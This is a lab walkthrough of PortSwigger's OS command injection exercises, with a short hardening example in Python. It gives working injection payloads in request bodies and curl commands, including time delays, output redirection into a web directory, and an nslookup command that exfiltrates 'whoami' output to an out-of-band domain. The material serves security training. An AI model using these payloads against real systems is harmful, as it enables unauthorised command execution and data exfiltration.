OS Command Injection - [PortSwigger]

Marmeus

    Introduction

    This post is a compilation of every Apprentice- and Practitioner-level lab on the OS Command Injection topic from PortSwigger Academy.

    OS command injection, simple case [Apprentice]

    When checking the stock of a product, if you provide a ; instead of a number, you will get the following response.

    # REQUEST
    POST /product/stock HTTP/1.1
    [...]
    
    productId=%3b&storeId=1
    
    # RESPONSE
    /home/peter-yZTpOD/stockreport.sh: line 5: $1: unbound variable
    sh: 1: 1: not found

    After the ;, if you try to add whoami, you will get the following result.

    # REQUEST
    productId=%3b+whoami&storeId=1
    
    # RESPONSE
    /home/peter-yZTpOD/stockreport.sh: line 5: $1: unbound variable
    whoami: extra operand '1'
    Try 'whoami --help' for more information.

    Now that we know the second parameter (storeId) is also appended to the command line, we can add a shell comment (#) so that everything after our payload is ignored.

    # REQUEST
    productId=%3b+whoami+#&storeId=1
    
    # RESPONSE
    peter-yZTpOD
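    As an added illustration (not code from the original post or from the lab), the following shows the unsafe pattern the stock check appears to follow beside a hardened version. The script path, the function names and the numeric allow-list are assumptions; the tokenizer reproduces why `; whoami` leaves storeId as an "extra operand" and why the trailing `#` makes it disappear.

```python
import re
import shlex
import subprocess

# Assumed path, modelled on the script name in the lab's error message
STOCK_SCRIPT = "/home/peter/stockreport.sh"


def vulnerable_command(product_id, store_id):
    """The pattern the lab's backend appears to follow: raw request
    parameters interpolated into one command line that a shell parses.
    Returned as a string for inspection; never executed here."""
    return f"{STOCK_SCRIPT} {product_id} {store_id}"


def shell_words(command):
    """Tokenise like a POSIX shell (comments stripped) to show how the
    injected text becomes separate words and how '#' drops storeId."""
    return shlex.split(command, comments=True)


# Hardened form: allow-list the identifiers and never involve a shell.
ID_RE = re.compile(r"[0-9]{1,9}")


def validate_id(value):
    """Accept only a short decimal number; reject anything else."""
    if not ID_RE.fullmatch(value):
        raise ValueError(f"invalid identifier: {value!r}")
    return value


def safe_argv(product_id, store_id, script=STOCK_SCRIPT):
    """Build an argv list; each parameter is exactly one argument, so
    shell metacharacters such as ';' or '#' carry no meaning."""
    return [script, validate_id(product_id), validate_id(store_id)]


def run_stock_check(product_id, store_id, script=STOCK_SCRIPT):
    """Run the report script without a shell (shell=False is the default),
    so the validated ids reach the script as plain arguments."""
    result = subprocess.run(safe_argv(product_id, store_id, script),
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()
```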
    

    Blind OS command injection with time delays [Practitioner]

    As the exercise statement says, we need to work with time delays in the feedback (email) form. Trying the payload ;+sleep+10+# in every field shows that the email parameter is the one vulnerable to OS command injection.

    Blind OS command injection with output redirection [Practitioner]

    The email field, as in the previous exercise, is vulnerable to command injection.

    kali@kali:~$ curl -b "session=<YOUR_COOKIE>" -X POST https://<LAB_DOMAIN>.web-security-academy.net/feedback/submit -H "Content-Type: application/x-www-form-urlencoded" -d "csrf=<CSRF_TOKEN>&name=a&email=;+whoami+>+/var/www/images/test+#&subject=a&message=1"

    After redirecting the output into the images directory, we can use the image-loading endpoint to retrieve the file's content.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=test
    peter-mqAI1U
    

    Blind OS command injection with out-of-band interaction [Practitioner]

    The vulnerability is the same as before; we only need to change the command.

    kali@kali:~$ curl -b "session=<YOUR_COOKIE>" -X POST https://<LAB_DOMAIN>.web-security-academy.net/feedback/submit -H "Content-Type: application/x-www-form-urlencoded" -d "csrf=<CSRF_TOKEN>&name=a&email=;+nslookup+<BURP_DOMAIN>+#&subject=a&message=1"

    Blind OS command injection with out-of-band data exfiltration [Practitioner]

    Same as before, but running whoami inside a command substitution so that its output becomes a subdomain of the Collaborator domain.

    kali@kali:~$ curl -b "session=<YOUR_COOKIE>" -X POST https://<LAB_DOMAIN>.web-security-academy.net/feedback/submit -H "Content-Type: application/x-www-form-urlencoded" -d 'csrf=<CSRF_TOKEN>&name=a&email=;+nslookup+$(whoami).<BURP_DOMAIN>+#&subject=a&message=1'